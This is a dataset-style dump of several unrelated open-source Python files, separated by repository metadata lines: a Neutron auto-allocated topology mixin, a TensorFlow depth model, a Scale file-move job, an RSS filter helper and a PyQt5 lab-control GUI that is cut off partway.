resource, event, trigger, context, request, network, **kwargs):
"""Ensure the is_default db field matches the create/update request."""
is_default = request.get(IS_DEFAULT)
if is_default is None:
return
if is_default:
# ensure there is only one default external network at any given time
pager = base_obj.Pager(limit=1)
objs = net_obj.ExternalNetwork.get_objects(context,
_pager=pager, is_default=True)
if objs:
if objs[0] and network['id'] != objs[0].network_id:
raise exceptions.DefaultExternalNetworkExists(
net_id=objs[0].network_id)
orig = kwargs.get('original_network')
if orig and orig.get(IS_DEFAULT) == is_default:
return
network[IS_DEFAULT] = is_default
# Reflect the status of the is_default on the create/update request
obj = net_obj.ExternalNetwork.get_object(context,
network_id=network['id'])
if obj:
obj.is_default = is_default
obj.update()
@resource_extend.has_resource_extenders
class AutoAllocatedTopologyMixin(common_db_mixin.CommonDbMixin):
def __new__(cls, *args, **kwargs):
# NOTE(kevinbenton): we subscribe on object construction because
# the tests blow away the callback manager for each run
new = super(AutoAllocatedTopologyMixin, cls).__new__(cls, *args,
**kwargs)
registry.subscribe(_ensure_external_network_default_value_callback,
resources.NETWORK, events.PRECOMMIT_UPDATE)
registry.subscribe(_ensure_external_network_default_value_callback,
resources.NETWORK, events.PRECOMMIT_CREATE)
return new
# TODO(armax): if a tenant modifies auto allocated resources under
# the hood the behavior of the get_auto_allocated_topology API is
# undetermined. Consider adding callbacks to deal with the following
# situations:
# - insert subnet -> plug router interface
# - delete router -> remove the entire topology
# - update subnet -> prevent operation
# - update router gateway -> prevent operation
# - ...
@property
def core_plugin(self):
if not getattr(self, '_core_plugin', None):
self._core_plugin = directory.get_plugin()
return self._core_plugin
@property
def l3_plugin(self):
if not getattr(self, '_l3_plugin', None):
self._l3_plugin = directory.get_plugin(constants.L3)
return self._l3_plugin
@staticmethod
@resource_extend.extends([net_def.COLLECTION_NAME])
def _extend_external_network_default(net_res, net_db):
"""Add is_default field to 'show' response."""
if net_db.external is not None:
net_res[IS_DEFAULT] = net_db.external.is_default
return net_res
def get_auto_allocated_topology(self, context, tenant_id, fields=None):
"""Return tenant's network associated to auto-allocated topology.
The topology will be provisioned upon return, if network is missing.
"""
fields = fields or []
tenant_id = self._validate(context, tenant_id)
if CHECK_REQUIREMENTS in fields:
# for dry-run requests, simply validates that subsequent
# requests can be fulfilled based on a set of requirements
# such as existence of default networks, pools, etc.
return self._check_requirements(context, tenant_id)
elif fields:
raise n_exc.BadRequest(resource='auto_allocate',
msg=_("Unrecognized field"))
# Check for an existent topology
network_id = self._get_auto_allocated_network(context, tenant_id)
if network_id:
return self._response(network_id, tenant_id, fields=fields)
# See if we indeed have an external network to connect to, otherwise
# we will fail fast
default_external_network = self._get_default_external_network(
context)
# If we reach this point, then we got some work to do!
network_id = self._build_topology(
context, tenant_id, default_external_network)
return self._response(network_id, tenant_id, fields=fields)
def delete_auto_allocated_topology(self, context, tenant_id):
tenant_id = self._validate(context, tenant_id)
topology = self._get_auto_allocated_topology(context, tenant_id)
if topology:
subnets = self.core_plugin.get_subnets(
context,
filters={'network_id': [topology['network_id']]})
self._cleanup(
context, network_id=topology['network_id'],
router_id=topology['router_id'], subnets=subnets)
def _build_topology(self, context, tenant_id, default_external_network):
"""Build the network topology and returns its network UUID."""
try:
subnets = self._provision_tenant_private_network(
context, tenant_id)
network_id = subnets[0]['network_id']
router = self._provision_external_connectivity(
context, default_external_network, subnets, tenant_id)
network_id = self._save(
context, tenant_id, network_id, router['id'], subnets)
return network_id
except exceptions.UnknownProvisioningError as e:
# Clean partially provisioned topologies, and reraise the
# error. If it can be retried, so be it.
LOG.error("Unknown error while provisioning topology for "
"tenant %(tenant_id)s. Reason: %(reason)s",
{'tenant_id': tenant_id, 'reason': e})
self._cleanup(
context, network_id=e.network_id,
router_id=e.router_id, subnets=e.subnets)
raise e.error
def _check_requirements(self, context, tenant_id):
"""Raise if requirements are not met."""
self._get_default_external_network(context)
try:
self._get_supported_subnetpools(context)
except n_exc.NotFound:
raise exceptions.AutoAllocationFailure(
reason=_("No default subnetpools defined"))
return {'id': 'dry-run=pass', 'tenant_id': tenant_id}
def _validate(self, context, tenant_id):
"""Validate and return the tenant to be associated to the topology."""
if tenant_id == 'None':
# NOTE(HenryG): the client might be sending us astray by
# passing no tenant; this is really meant to be the tenant
# issuing the request, therefore let's get it from the context
tenant_id = context.tenant_id
if not context.is_admin and tenant_id != context.tenant_id:
raise n_exc.NotAuthorized()
return tenant_id
def _get_auto_allocated_topology(self, context, tenant_id):
"""Return the auto allocated topology record if present or None."""
return auto_allocate_obj.AutoAllocatedTopology.get_object(
context, project_id=tenant_id)
def _get_auto_allocated_network(self, context, tenant_id):
"""Get the auto allocated network for the tenant."""
network = self._get_auto_allocated_topology(context, tenant_id)
if network:
return network['network_id']
@staticmethod
def _response(network_id, tenant_id, fields=None):
"""Build response for auto-allocated network."""
res = {
'id': network_id,
'tenant_id': tenant_id
}
return db_utils.resource_fields(res, fields)
def _get_default_external_network(self, context):
"""Get the default external network for the deployment."""
default_external_networks = net_obj.ExternalNetwork.get_objects(
context, is_default=True)
if not default_external_networks:
LOG.error("Unable to find default external network "
"for deployment, please create/assign one to "
"allow auto-allocation to work correctly.")
raise exceptions.AutoAllocationFailure(
reason=_("No default router:external network"))
if len(default_external_networks) > 1:
LOG.error("Multiple external default networks detected. "
"Network %s is true 'default'.",
default_external_networks[0]['network_id'])
return default_external_networks[0].network_id
def _get_supported_subnetpools(self, context):
"""Return the default subnet pools available."""
default_subnet_pools = [
self.core_plugin.get_default_subnetpool(
context, ver) for ver in (4, 6)
]
available_pools = [
s for s in default_subnet_pools if s
]
if not available_pools:
LOG.error("No default pools available")
raise n_exc.NotFound()
return available_pools
def _provision_tenant_private_network(self, context, tenant_id):
"""Create a tenant private network/subnets."""
network = None
try:
network_args = {
'name': 'auto_allocated_network',
'admin_state_up': False,
'tenant_id': tenant_id,
'shared': False
}
network = p_utils.create_network(
self.core_plugin, context, {'network': network_args})
subnets = []
for pool in self._get_supported_subnetpools(context):
subnet_args = {
'name': 'auto_allocated_subnet_v%s' % pool['ip_version'],
'network_id': network['id'],
'tenant_id': tenant_id,
'ip_version': pool['ip_version'],
'subnetpool_id': pool['id'],
}
subnets.append(p_utils.create_subnet(
self.core_plugin, context, {'subnet': subnet_args}))
return subnets
except (c_exc.SubnetAllocationError, ValueError,
n_exc.BadRequest, n_exc.NotFound) as e:
LOG.error("Unable to auto allocate topology for tenant "
"%(tenant_id)s due to missing or unmet "
"requirements. Reason: %(reason)s",
{'tenant_id': tenant_id, 'reason': e})
if network:
self._cleanup(context, network['id'])
raise exceptions.AutoAllocationFailure(
reason=_("Unable to provide tenant private network"))
except Exception as e:
network_id = network['id'] if network else None
raise exceptions.UnknownProvisioningError(e, network_id=network_id)
def _provision_external_connectivity(
self, context, default_external_network, subnets, tenant_id):
"""Uplink tenant subnet(s) to external network."""
router_args = {
'name': 'auto_allocated_router',
l3.EXTERNAL_GW_INFO: {'network_id': default_external_network},
'tenant_id': tenant_id,
'admin_state_up': True
}
router = None
attached_subnets = []
try:
router = self.l3_plugin.create_router(
context, {'router': router_args})
for subnet in subnets:
self.l3_plugin.add_router_interface(
context, router['id'], {'subnet_id': subnet['id']})
attached_subnets.append(subnet)
return router
except n_exc.BadRequest as e:
LOG.error("Unable to auto allocate topology for tenant "
"%(tenant_id)s because of router errors. "
"Reason: %(reason)s",
{'tenant_id': tenant_id, 'reason': e})
router_id = router['id'] if router else None
self._cleanup(context,
network_id=subnets[0]['network_id'],
router_id=router_id, subnets=attached_subnets)
raise exceptions.AutoAllocationFailure(
reason=_("Unable to provide external connectivity"))
except Exception as e:
router_id = router['id'] if router else None
raise exceptions.UnknownProvisioningError(
e, network_id=subnets[0]['network_id'],
router_id=router_id, subnets=subnets)
def _save(self, context, tenant_id, network_id, router_id, subnets):
"""Save auto-allocated topology, or revert in case of DB errors."""
try:
auto_allocate_obj.AutoAllocatedTopology(
context, project_id=tenant_id, network_id=network_id,
router_id=router_id).create()
self.core_plugin.update_network(
context, network_id,
{'network': {'admin_state_up': True}})
except obj_exc.NeutronDbObjectDuplicateEntry:
LOG.debug("Multiple auto-allocated networks detected for "
"tenant %s. Attempting clean up for network %s "
"and router %s.",
tenant_id, network_id, router_id)
self._cleanup(
context, network_id=network_id,
router_id=router_id, subnets=subnets)
network_id = self._get_auto_allocated_network(context, tenant_id)
except Exception as e:
raise exceptions.UnknownProvisioningError(
e, network_id=network_id,
router_id=router_id, subnets=subnets)
return network_id
def _cleanup(self, context, network_id=None, router_id=None, subnets=None):
"""Clean up auto allocated resources."""
# Concurrent attempts to delete the topology may interleave and
# cause some operations to fail with NotFound exceptions. Rather
# than fail partially, the exceptions should be ignored and the
# cleanup should proceed uninterrupted.
if router_id:
for subnet in subnets or []:
ignore_notfound(
self.l3_plugin.remove_router_interface,
context, router_id, {'subnet_id': subnet['id']})
ignore_notfound(self.l3_plugin.delete_router, context, router_id)
if network_id:
ignore_notfound(
self.core_plugin.delete_network, context, network_id)
def ignore_notfound(func, *args, **kwargs):
"""Call the given function and pass if a `NotFound` exception is raised."""
try:
return func(*args, **kwargs)
except n_exc.NotFound:
pass
|
apache-2.0
| 3,746,684,057,430,448,000
| 42.740741
| 79
| 0.610016
| false
| 4.374074
| false
| false
| false
|
min2209/dwt
|
WTN/depth_model.py
|
1
|
6876
|
import numpy as np
from math import ceil
import tensorflow as tf
import math
import scipy.io as sio
VGG_MEAN = [103.939, 116.779, 123.68]
class Network:
def __init__(self, params, wd=5e-5, modelWeightPaths=None):
self._params = params
self._images = tf.placeholder("float")
self._batch_images = tf.expand_dims(self._images, 0)
self._gt = tf.placeholder("float")
self._batch_gt = tf.expand_dims(self._gt, 0)
self._wd = wd
self.modelDict = {}
if modelWeightPaths is not None:
for path in modelWeightPaths:
self.modelDict.update(sio.loadmat(path))
def build(self, inputData, ss, keepProb=1):
self.conv1_1 = self._conv_layer(inputData, params=self._params["depth/conv1_1"])
self.conv1_2 = self._conv_layer(self.conv1_1, params=self._params["depth/conv1_2"])
self.pool1 = self._average_pool(self.conv1_2, 'depth/pool')
self.conv2_1 = self._conv_layer(self.pool1, params=self._params["depth/conv2_1"])
self.conv2_2 = self._conv_layer(self.conv2_1, params=self._params["depth/conv2_2"])
self.conv2_3 = self._conv_layer(self.conv2_2, params=self._params["depth/conv2_3"])
self.conv2_4 = self._conv_layer(self.conv2_3, params=self._params["depth/conv2_4"])
self.pool2 = self._average_pool(self.conv2_4, 'depth/pool')
self.fcn1 = self._conv_layer_dropout(self.pool2, params=self._params["depth/fcn1"], keepProb=keepProb)
self.fcn2 = self._conv_layer_dropout(self.fcn1, params=self._params["depth/fcn2"], keepProb=keepProb)
self.outputData = self._upscore_layer(self.fcn2, params=self._params["depth/upscore"],
shape=tf.shape(inputData))
self.outputDataArgMax = tf.argmax(input=self.outputData, dimension=3)
def _max_pool(self, bottom, name):
return tf.nn.max_pool(bottom, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', name=name)
def _average_pool(self, bottom, name):
return tf.nn.avg_pool(bottom, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', name=name)
def _conv_layer(self, bottom, params):
with tf.variable_scope(params["name"]) as scope:
filt = self.get_conv_filter(params)
conv = tf.nn.conv2d(bottom, filt, [1, 1, 1, 1], padding='SAME')
conv_biases = self.get_bias(params)
if params["act"] == "relu":
activation = tf.nn.relu(tf.nn.bias_add(conv, conv_biases))
elif params["act"] == "lin":
activation = tf.nn.bias_add(conv, conv_biases)
elif params["act"] == "tanh":
activation = tf.nn.tanh(tf.nn.bias_add(conv, conv_biases))
return activation
def _conv_layer_dropout(self, bottom, params, keepProb):
with tf.variable_scope(params["name"]) as scope:
filt = self.get_conv_filter(params)
conv = tf.nn.conv2d(bottom, filt, [1, 1, 1, 1], padding='SAME')
conv_biases = self.get_bias(params)
if params["act"] == "relu":
activation = tf.nn.relu(tf.nn.bias_add(conv, conv_biases))
elif params["act"] == "lin":
activation = tf.nn.bias_add(conv, conv_biases)
elif params["act"] == "tanh":
activation = tf.nn.tanh(tf.nn.bias_add(conv, conv_biases))
activation = tf.nn.dropout(activation, keepProb, seed=0)
return activation
# WEIGHTS GENERATION
def get_bias(self, params):
if params["name"]+"/biases" in self.modelDict:
init = tf.constant_initializer(value=self.modelDict[params["name"]+"/biases"], dtype=tf.float32)
print "loaded " + params["name"] + "/biases"
else:
init = tf.constant_initializer(value=0.0)
print "generated " + params["name"] + "/biases"
var = tf.get_variable(name="biases", initializer=init, shape=params["shape"][3])
return var
def get_conv_filter(self, params):
if params["name"]+"/weights" in self.modelDict:
init = tf.constant_initializer(value=self.modelDict[params["name"]+"/weights"], dtype=tf.float32)
var = tf.get_variable(name="weights", initializer=init, shape=params["shape"])
print "loaded " + params["name"]+"/weights"
else:
if params["std"]:
stddev = params["std"]
else:
fanIn = params["shape"][0]*params["shape"][1]*params["shape"][2]
stddev = (2/float(fanIn))**0.5
init = tf.truncated_normal(shape=params["shape"], stddev=stddev, seed=0)
var = tf.get_variable(name="weights", initializer=init)
print "generated " + params["name"] + "/weights"
if not tf.get_variable_scope().reuse:
weightDecay = tf.mul(tf.nn.l2_loss(var), self._wd,
name='weight_loss')
tf.add_to_collection('losses', weightDecay)
return var
def _upscore_layer(self, bottom, shape, params):
strides = [1, params["stride"], params["stride"], 1]
with tf.variable_scope(params["name"]):
in_features = bottom.get_shape()[3].value
new_shape = [shape[0], shape[1], shape[2], params["outputChannels"]]
output_shape = tf.pack(new_shape)
f_shape = [params["ksize"], params["ksize"], params["outputChannels"], in_features]
weights = self.get_deconv_filter(f_shape, params)
deconv = tf.nn.conv2d_transpose(bottom, weights, output_shape,
strides=strides, padding='SAME')
return deconv
def get_deconv_filter(self, f_shape, params):
if params["name"]+"/up_filter" in self.modelDict:
init = tf.constant_initializer(value=self.modelDict[params["name"]+"/up_filter"], dtype=tf.float32)
print "loaded " + params["name"]+"/up_filter"
else:
width = f_shape[0]
height = f_shape[0]
f = ceil(width / 2.0)
c = (2 * f - 1 - f % 2) / (2.0 * f)
bilinear = np.zeros([f_shape[0], f_shape[1]])
for x in range(width):
for y in range(height):
value = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
bilinear[x, y] = value
weights = np.zeros(f_shape)
for i in range(f_shape[2]):
weights[:, :, i, i] = bilinear
init = tf.constant_initializer(value=weights,
dtype=tf.float32)
print "generated " + params["name"] + "/up_filter"
return tf.get_variable(name="up_filter", initializer=init, shape=f_shape)
|
mit
| -6,771,102,239,200,756,000
| 41.98125
| 111
| 0.5605
| false
| 3.531587
| false
| false
| false
|
ngageoint/scale
|
scale/storage/move_files_job.py
|
1
|
4159
|
"""Defines the functions necessary to move a file to a different workspace/uri"""
from __future__ import unicode_literals
import logging
import os
import sys
from error.exceptions import ScaleError, get_error_by_exception
from messaging.manager import CommandMessageManager
from storage.brokers.broker import FileDownload, FileMove, FileUpload
from storage.messages.move_files import create_move_file_message
from storage.models import ScaleFile
logger = logging.getLogger(__name__)
GENERAL_FAIL_EXIT_CODE = 1
def move_files(file_ids, new_workspace=None, new_file_path=None):
"""Moves the given files to a different workspace/uri
:param file_ids: List of ids of ScaleFile objects to move; should all be from the same workspace
:type file_ids: [int]
:param new_workspace: New workspace to move files to
:type new_workspace: `storage.models.Workspace`
:param new_file_path: New path for files
:type new_file_path: string
"""
try:
messages = []
files = ScaleFile.objects.all()
files = files.select_related('workspace')
files = files.defer('workspace__json_config')
files = files.filter(id__in=file_ids).only('id', 'file_name', 'file_path', 'workspace')
old_files = []
old_workspace = files[0].workspace
if new_workspace:
# We need a local path to copy the file, try to get a direct path from the broker, if that fails we must
# download the file and copy from there
# TODO: a future refactor should make the brokers work off of file objects instead of paths so the extra
# download is not necessary
paths = old_workspace.get_file_system_paths([files])
local_paths = []
if paths:
local_paths = paths
else:
file_downloads = []
for file in files:
local_path = os.path.join('/tmp', file.file_name)
file_downloads.append(FileDownload(file, local_path, False))
local_paths.append(local_path)
ScaleFile.objects.download_files(file_downloads)
uploads = []
for file, path in zip(files, local_paths):
old_path = file.file_path
old_files.append(ScaleFile(file_name=file.file_name, file_path=file.file_path))
file.file_path = new_file_path if new_file_path else file.file_path
logger.info('Copying %s in workspace %s to %s in workspace %s', old_path, file.workspace.name,
file.file_path, new_workspace.name)
file_upload = FileUpload(file, path)
uploads.append(file_upload)
message = create_move_file_message(file_id=file.id)
messages.append(message)
ScaleFile.objects.upload_files(new_workspace, uploads)
elif new_file_path:
moves = []
for file in files:
logger.info('Moving %s to %s in workspace %s', file.file_path, new_file_path,
file.workspace.name)
moves.append(FileMove(file, new_file_path))
message = create_move_file_message(file_id=file.id)
messages.append(message)
ScaleFile.objects.move_files(moves)
else:
logger.info('No new workspace or file path. Doing nothing')
CommandMessageManager().send_messages(messages)
if new_workspace:
# Copied files to new workspace, so delete file in old workspace (if workspace provides local path to do so)
old_workspace.delete_files(old_files, update_model=False)
except ScaleError as err:
err.log()
sys.exit(err.exit_code)
except Exception as ex:
exit_code = GENERAL_FAIL_EXIT_CODE
err = get_error_by_exception(ex.__class__.__name__)
if err:
err.log()
exit_code = err.exit_code
else:
logger.exception('Error performing move_files steps')
sys.exit(exit_code)
|
apache-2.0
| -5,702,555,513,659,372,000
| 40.178218
| 120
| 0.605674
| false
| 4.150699
| false
| false
| false
|
cuducos/filterss
|
filterss/helpers.py
|
1
|
4366
|
import re
from .forms import FilterForm
from email.utils import parsedate_tz
from filterss import app
from flask import request
from textwrap import wrap
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from werkzeug.local import LocalProxy
from xml.dom.minidom import parse
def set_filter(value):
"""
Return filter as lower case string (for case-insensitive search) or
return None for blank/False values
"""
if value:
return str(value).strip().lower()
return None
def get_filters(obj):
"""
Gets an object (form, request, etc) and return a dictionary with the filter
"""
# if it is a FilterForm object with keys
if type(obj) is FilterForm:
d = obj.data
d['url'] = d['rss_url']
# if it is a GET request
elif type(obj) is LocalProxy:
keys = app.config['FILTERS']
d = dict(zip(keys, map((lambda k: request.args.get(k)), keys)))
# error
else:
return False
# return a dictionary without empty items
return clean_filters(d)
def clean_filters(d):
"""
Delete empty fields from the filters dictionary, strip and convert strings
to lower case
"""
return dict((k, set_filter(v)) for k, v in d.items() if v)
def url_vars(d):
"""
Returns a string with the URL encoded (GET) vars
"""
cleaned = clean_filters(d)
cleaned.pop('rss_url', None)
return urlencode(cleaned)
def connect_n_parse(url):
"""
Connect to a given URL and return the parse of the result
"""
try:
ua = 'Mozilla/5.0'
accept = 'application/rss+xml,application/xhtml+xml,application/xml'
hdr = {'User-Agent': ua, 'Accept': accept}
req = Request(url, headers=hdr)
doc = urlopen(req)
except:
doc = urlopen(url)
return parse(doc)
def test_conditions(d, title, link):
"""
Gets a dicitonary with the filters and test them comparing to the values
from the RSS (title and link)
"""
# iterate through the filters
for k in d.keys():
# check if it is a title, link or none (skip)
if k[0:1] == 't':
rss_content = title
elif k[0:1] == 'l':
rss_content = link
else:
rss_content = False
# test the conditions only for title and link
if rss_content:
inclusive = True if k[-3:] == 'inc' else False
cond = test_single_condition(d[k], rss_content, inclusive)
# return false if a match is found
if not cond:
return False
# else, return true
return True
def test_single_condition(condition, value, inclusive):
"""
Separte multiple conditions separeted by commas (filters) and test them for
a given value; the inclusive boolean var decide if it should or should not
be present in the given value. It always returns a boolean.
"""
if condition is None:
return True
condictons = condition.split(',')
for c in condictons:
c = c.strip()
if c and c in value.lower():
return inclusive
return not inclusive
def remove_tags(string):
"""
Return str with certaing html/xml tags removed (title, link and pubDate)
"""
tags = ['title', 'link', 'pubDate']
tags_re = '({})'.format('|'.join(tags))
starttag_re = re.compile(r'<{}(/?>|(\s+[^>]*>))'.format(tags_re, re.U))
endtag_re = re.compile('</{}>'.format(tags_re))
string = starttag_re.sub('', string)
string = endtag_re.sub('', string)
string = string.replace('<![CDATA[', '')
string = string.replace(']]>', '')
return string.strip()
def word_wrap(txt, length=120):
"""
Return a wrapped a paragraph adding elipse after the first word that
appears after a given number of characters (length var)
"""
if len(txt) <= length or length == 0:
return txt
new_txt = wrap(txt, length)
return new_txt[0] + u'…'
def format_date(string):
"""
Return a date & time (dd/mm/yyyy hh:mm) from a rfc822 string format
"""
new_date = parsedate_tz(string)
y = new_date[0]
m = '{0:0>2}'.format(new_date[1])
d = '{0:0>2}'.format(new_date[2])
H = '{0:0>2}'.format(new_date[3])
i = '{0:0>2}'.format(new_date[4])
return '{}/{}/{} {}:{}'.format(d, m, y, H, i)
|
mit
| 3,528,421,072,841,698,000
| 26.446541
| 79
| 0.601971
| false
| 3.670311
| true
| false
| false
|
uprm-research-resto/coliform-project
|
Coliform/GUI.py
|
1
|
42197
|
#!/usr/bin/env python3
#
# This is the main GUI function for Coliform Project
#
# This file is part of Coliform. https://github.com/Regendor/coliform-project
# (C) 2016
# Author: Osvaldo E Duran
# Licensed under the GNU General Public License version 3.0 (GPL-3.0)
import os
import time
import sys
try:
import matplotlib
matplotlib.use('Qt5Agg')
from PyQt5.QtCore import QTimer, Qt, QCoreApplication, QObject, pyqtSignal
from PyQt5.QtGui import QColor, QPalette
from PyQt5.QtWidgets import QApplication, QDesktopWidget, QMessageBox, QVBoxLayout, QHBoxLayout
from PyQt5.QtWidgets import QLabel, QMainWindow, QWidget, QGroupBox, QPushButton, QRadioButton, QLineEdit, QFileDialog
except ImportError:
from tkinter import messagebox
messagebox.showinfo(message='Please close this dialog and install dependencies typing the following in terminal:\n'
'python3\n'
'from Coliform import InitialSetup\n'
'InitialSetup.addShortcuts()\n'
'InitialSetup.installDependencies()\n')
from Coliform import OneWire, MultiPlot, RPiGPIO, RPiCamera, RGBSensor
import threading
# from datetime import datetime
'''
import as:
from Coliform import GUI
use as:
GUI.startGUI()
'''
class GUICenterWidget(QWidget):
def __init__(self):
super(GUICenterWidget, self).__init__()
self.initUI()
self.start_time = time.time()
def initUI(self):
self.tf = 'PlotTextFile.txt'
self.createTopLeftGroupBox()
self.createTopRightGroupBox()
self.createBottomLeftGroupBox()
self.createBottomRightGroupBox()
topLayout = QHBoxLayout()
topLayout.addWidget(self.topLeftGroupBox)
topLayout.addWidget(self.topRightGroupBox)
bottomLayout = QHBoxLayout()
bottomLayout.addWidget(self.bottomLeftGroupBox)
bottomLayout.addWidget(self.bottomRightGroupBox)
mainLayout = QVBoxLayout()
mainLayout.addLayout(topLayout)
mainLayout.addLayout(bottomLayout)
mainLayout.addStretch(1)
self.setLayout(mainLayout)
self.show()
def createTopLeftGroupBox(self):
self.topLeftGroupBox = QGroupBox("Temperature Sensor")
tempLabel = QLabel('Temperature: ')
self.tempValLabel = QLabel('NULL')
plotButton = QPushButton("Show Plot")
plotButton.clicked.connect(self.tempPlot)
saveDataButton = QPushButton('Save Data File')
saveDataButton.clicked.connect(self.savefile)
vbox1 = QVBoxLayout()
vbox1.addWidget(tempLabel)
vbox1.addWidget(self.tempValLabel)
vbox2 = QVBoxLayout()
vbox2.addWidget(plotButton)
vbox2.addWidget(saveDataButton)
layout = QHBoxLayout()
layout.addLayout(vbox1)
layout.addLayout(vbox2)
layout.addStretch(1)
self.topLeftGroupBox.setLayout(layout)
def createTopRightGroupBox(self):
self.topRightGroupBox = QGroupBox('Heater')
heatLabel = QLabel('Target Temperature(C):')
heatEntry = QLineEdit()
heatEntry.textChanged[str].connect(self.tempOnChanged)
heatEntry.setText('41')
self.heatButton = QPushButton('Heater ON')
self.heatButton.clicked.connect(self.heaterPower)
hbox1 = QHBoxLayout()
hbox1.addWidget(heatLabel)
hbox1.addWidget(heatEntry)
hbox2 = QHBoxLayout()
hbox2.addWidget(self.heatButton)
layout = QVBoxLayout()
layout.addLayout(hbox1)
layout.addLayout(hbox2)
layout.addStretch(1)
self.topRightGroupBox.setLayout(layout)
def createBottomLeftGroupBox(self):
self.bottomLeftGroupBox = QGroupBox('Pump')
self.pumpPowerButton = QPushButton('Power ON')
self.pumpPowerButton.clicked.connect(self.pumpPower)
pumpEntry = QLineEdit()
pumpEntry.textChanged[str].connect(self.pumpOnChanged)
pumpValChangeButton = QPushButton('Submit')
pumpValChangeButton.clicked.connect(self.pumppowerchange)
layout = QVBoxLayout()
layout.addWidget(self.pumpPowerButton)
layout.addWidget(pumpEntry)
layout.addWidget(pumpValChangeButton)
layout.addStretch(1)
self.bottomLeftGroupBox.setLayout(layout)
def tempOnChanged(self, text):
if text != '':
self.tempTarget = int(float(text))
def pumpOnChanged(self, text):
if text:
self.pumppwmvalue = int(float(text))
def createBottomRightGroupBox(self):
self.bottomRightGroupBox = QGroupBox('Status')
self.tempSensorLbl = QLabel('Temp. Sensor OFF')
self.pumpLbl = QLabel('Pump OFF')
self.heatLbl = QLabel('Heater OFF')
layout = QVBoxLayout()
layout.addWidget(self.tempSensorLbl)
layout.addWidget(self.pumpLbl)
layout.addWidget(self.heatLbl)
layout.addStretch(1)
self.bottomRightGroupBox.setLayout(layout)
def statusOnChanged(self, text):
if 'Temp. Sensor' in text:
self.tempSensorStatus = text
self.tempSensorLbl.adjustSize()
elif 'Pump' in text:
self.pumpStatus = text
self.pumpLbl.adjustSize()
elif 'Heater' in text:
self.heatStatus = text
self.heatLbl.adjustSize()
def onewireOn(self):
try:
self.ids = OneWire.getOneWireID()
TemperatureDegrees, self.TemperatureNumber = OneWire.getTempList()
self.tempValLabel.setText(TemperatureDegrees)
MultiPlot.GeneratePlotDataFile(self.tf, self.TemperatureNumber, self.start_time)
if not self.ids:
self.tempSensorLbl.setText('Temp. Sensor OFF')
self.tempValLabel.setText('NULL')
self.tempValLabel.adjustSize()
else:
self.tempSensorLbl.setText('Temp. Sensor ON')
self.tempValLabel.adjustSize()
except IndexError:
pass
def tempPlot(self):
try:
self.y_title_axis = ['Temperature Plot', 'Temperature vs Time', 't(s)', 'T(C)', 'Sensor']
MultiPlot.Plot(self.tf, len(self.ids), self.y_title_axis)
except KeyError:
mb = QMessageBox()
mb.setIcon(QMessageBox.Information)
mb.setWindowTitle('Error')
mb.setText('No temperature sensor connected.')
mb.setStandardButtons(QMessageBox.Ok)
mb.show()
def pumpPower(self):
if 'OFF' in self.pumpLbl.text():
self.PUMPPWM = RPiGPIO.Controller(11, 100)
self.PUMPPWM.startup()
self.pumpLbl.setText('Pump ON')
self.pumpPowerButton.setText('Power OFF')
elif 'ON' in self.pumpLbl.text():
self.PUMPPWM.shutdown()
self.pumpLbl.setText('Pump OFF')
self.pumpPowerButton.setText('Power ON')
def savefile(self):
tempfilename = 'TemperatureData.csv'
filepath = QFileDialog.getExistingDirectory(self, 'Choose Directory', os.sep.join((os.path.expanduser('~'), 'Desktop')))
self.y_variablename = 'TemperatureSensor'
MultiPlot.SaveToCsv(self.tf, tempfilename, filepath, len(self.ids), self.y_variablename)
mb = QMessageBox()
mb.setIcon(QMessageBox.Information)
mb.setWindowTitle('Information')
mb.setText('File saved to directory.')
mb.setStandardButtons(QMessageBox.Ok)
mb.show()
def heaterPower(self):
if 'OFF' in self.heatLbl.text():
self.heatLbl.setText('Heater ON')
self.heatButton.setText('Power OFF')
self.HEATPWM = RPiGPIO.Controller(12, 100)
self.HEATPWM.startup()
elif 'ON' in self.heatLbl.text():
self.HEATPWM.shutdown()
self.heatLbl.setText('Heater OFF')
self.heatButton.setText('Power ON')
def heaterinput(self):
if self.heatLbl.text() != 'Heater OFF':
value = float(self.tempTarget)
sensor = float(self.TemperatureNumber[1])
self.HEATPWM.HeaterPID(value, sensor)
def pumppowerchange(self):
try:
if self.pumppwmvalue > 100:
raise ValueError
else:
self.PUMPPWM.setIntensity(self.pumppwmvalue)
except ValueError:
mb = QMessageBox()
mb.setIcon(QMessageBox.Information)
mb.setWindowTitle('Error')
mb.setText('Please type in a value between 0-100.')
mb.setStandardButtons(QMessageBox.Ok)
mb.show()
class GUIMainWindow(QMainWindow):
def __init__(self):
super(GUIMainWindow, self).__init__()
self.initUI()
def initUI(self):
# QToolTip.setFont(QFont('SansSerif', 9))
self.cwidget = GUICenterWidget()
self.setCentralWidget(self.cwidget)
# self.setToolTip('This is a <b>QWidget</b> widget')
self.statusBar().showMessage('Ready')
self.center()
self.setWindowTitle('Coliform Control GUI')
self.onewiretimer = QTimer(self)
self.onewiretimer.timeout.connect(self.cwidget.onewireOn)
self.onewiretimer.start(1000)
# self.p = QPalette(self.palette())
# self.p.setColor(QPalette.Window, QColor(53, 53, 53))
# self.p.setColor(QPalette.WindowText, Qt.white)
# self.p.setColor(QPalette.AlternateBase, QColor(53, 53, 53))
# self.p.setColor(QPalette.ToolTipBase, Qt.white)
# self.p.setColor(QPalette.ToolTipText, Qt.white)
# self.p.setColor(QPalette.Button, QColor(53, 53, 53))
# self.p.setColor(QPalette.ButtonText, Qt.white)
# self.p.setColor(QPalette.BrightText, Qt.red)
# self.p.setColor(QPalette.Highlight, QColor(142, 45, 197).lighter())
# self.p.setColor(QPalette.HighlightedText, Qt.black)
# self.setPalette(self.p)
self.show()
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Message', 'Are you sure you want to quit?',
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
def quitApp(self):
QCoreApplication.instance().quit()
class CameraCenterWidget(QWidget):
def __init__(self):
super(CameraCenterWidget, self).__init__()
self.initUI()
# self.start_time = time.time()
def initUI(self):
self.tf = 'PlotTextFile.txt'
self.statusbar = 'Ready'
self.createTopGroupBox()
self.createMidTopGroupBox()
self.createMidBottomGroupBox()
self.createBottomLeftGroupBox()
self.createBottomRightGroupBox()
topLayout = QVBoxLayout()
topLayout.addWidget(self.topGroupBox)
